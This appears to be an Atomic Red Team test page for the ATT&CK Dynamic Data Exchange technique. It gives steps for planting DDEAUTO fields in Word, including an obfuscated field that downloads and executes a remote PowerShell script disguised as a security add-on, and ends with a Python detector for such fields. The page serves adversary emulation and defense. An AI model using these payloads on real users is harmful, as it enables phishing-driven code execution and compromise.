
Inter-Process Communication: Dynamic Data Exchange

Description from ATT&CK

Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by Component Object Model, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017)

Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via Phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection)

DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a Command and Scripting Interpreter. DDE execution can be invoked remotely via Remote Services such as Distributed Component Object Model (DCOM).(Citation: Fireeye Hunting COM June 2019)

Atomic Tests

Atomic Test #1 - Execute Commands

Executes commands via DDE using Microsoft Word

Supported Platforms: windows

auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd



Run it with these steps!

Open Microsoft Word

Insert tab -> Quick Parts -> Field

Choose = (Formula) and click OK.

After that, you should see a Field inserted in the document with the error "!Unexpected End of Formula". Right-click the Field and choose Toggle Field Codes.

The Field Code should now be displayed. Change it to contain the following:

{DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe" }


Atomic Test #2 - Execute PowerShell script via Word DDE

When the Word document opens, it prompts the user to click OK on a dialog box, then attempts to run PowerShell via DDEAUTO to download and execute a PowerShell script.

Supported Platforms: windows

auto_generated_guid: 47c21fb6-085e-4b0d-b4d2-26d72c3830b3



Attack Commands: Run with command_prompt!

start "$PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx"

Atomic Test #3 - DDEAUTO

TrustedSec - Unicorn -

SensePost DDEAUTO -

Word VBA Macro

Dragon's Tail

Supported Platforms: windows

auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181



Run it with these steps!

  1. Open Word

  2. Insert tab -> Quick Parts -> Field

  3. Choose = (Formula) and click ok.

  4. Once the field is inserted, you should now see "!Unexpected End of Formula"

  5. Right-click the Field, choose "Toggle Field Codes"

  6. Paste in the code from Unicorn or SensePost

  7. Save the Word document.

  8. DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe"

  9. DDEAUTO "C:\Programs\Microsoft\Office\MSWord\..\..\..\..\windows\system32\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\v1.0\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http://<server>/download.ps1'); # " "Microsoft Document Security Add-On"
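
For defenders, the field codes planted in Atomic Tests #1 and #3 can be recovered from a saved .docx without opening it in Word. The following is an added example, not part of Atomic Red Team: it reads word/document.xml, rejoins instruction text stored across several runs, resolves nested QUOTE fields like those in step 9, and reports DDE/DDEAUTO fields. The function names and the in-memory sample document are constructed for illustration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % NS

def resolve_quote(code):
    """A nested { QUOTE 105 101 120 } field evaluates to the characters 'iex'."""
    m = re.fullmatch(r"\s*QUOTE((?:\s+\d+)+)\s*", code, re.I)
    return "".join(chr(int(n)) for n in m.group(1).split()) if m else code

def field_codes(docx_bytes):
    """Instruction text of every top-level field, rejoined across runs."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    done, stack = [], []          # stack holds one text list per open field
    for el in root.iter():
        if el.tag == W + "fldSimple":
            done.append(el.get(W + "instr", ""))
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                stack.append([])
            elif kind == "end" and stack:
                code = resolve_quote("".join(stack.pop()))
                (stack[-1] if stack else done).append(code)  # nested -> parent
        elif el.tag == W + "instrText" and stack:
            stack[-1].append(el.text or "")
    return [" ".join(c.split()) for c in done]   # collapse whitespace

def dde_fields(docx_bytes):
    """Field codes whose keyword is DDE or DDEAUTO (case-insensitive)."""
    return [c for c in field_codes(docx_bytes) if re.match(r"DDE(AUTO)?\b", c, re.I)]

def sample_docx():
    """Constructed test input: the calc.exe field from this page, split over
    two runs, with 'cmd' written as a nested QUOTE field."""
    fc = '<w:r><w:fldChar w:fldCharType="%s"/></w:r>'
    it = '<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>'
    body = (fc % "begin" + it % "DDE" + it % "AUTO c:\\windows\\system32\\"
            + fc % "begin" + it % " QUOTE 99 109 100 " + fc % "end"
            + it % '.exe "/k calc.exe" ' + fc % "separate" + fc % "end")
    xml = '<w:document xmlns:w="%s"><w:body><w:p>%s</w:p></w:body></w:document>' % (NS, body)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", xml)
    return buf.getvalue()
```

Calling `dde_fields(sample_docx())` returns the reassembled field code. A keyword search over the raw XML would miss it because `DDEAUTO` and `cmd` never appear contiguously in the file.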